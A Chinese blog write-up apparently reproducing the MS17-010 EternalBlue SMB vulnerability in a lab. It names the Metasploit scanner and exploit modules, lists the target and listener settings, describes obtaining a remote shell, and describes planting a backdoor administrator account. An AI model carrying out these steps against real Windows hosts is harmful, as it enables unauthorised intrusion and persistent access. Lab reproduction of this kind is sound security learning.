永恒之蓝(ms17-010)漏洞复现

永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。

由于永恒之蓝利用工具会扫描开放445文件共享端口的Windows机器,所以如果用户开启445端口并且系统未打MS17-010补丁就会在无感状态下被不法分子向系统植入恶意代码。

实验

查看数据库是否开启service postgresql status

dead表示关闭
在这里插入图片描述

开启数据库
在这里插入图片描述

利用kali系统
打开msf
在这里插入图片描述

查看数据库情况,说明连接成功
在这里插入图片描述
搜索ms17_010
使用下面两个模块
在这里插入图片描述
扫描命令use auxiliary/scanner/smb/smb_ms17_010
攻击命令use exploit/windows/smb/ms17_010_eternalblue

关注RHOSTS主机段和THREADS线程,默认为1
在这里插入图片描述
设置扫描主机段
设置线程
在这里插入图片描述
Run开始扫描
用wireshark抓包

在这里插入图片描述

跟踪TCP流,得到靶机基本信息
发现了目标主机的系统和ip在这里插入图片描述
进行攻击
设置攻击目标set rhost
设置监听主机set lhost
在这里插入图片描述
options帮助
在这里插入图片描述

开始攻击exploit
在这里插入图片描述
直接拿到shell
ipconfig
确认是目标主机
在这里插入图片描述

种植后门

创建一个用户
并查看
在这里插入图片描述
加入管理员用户
并查看

在这里插入图片描述
成功植入用户

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值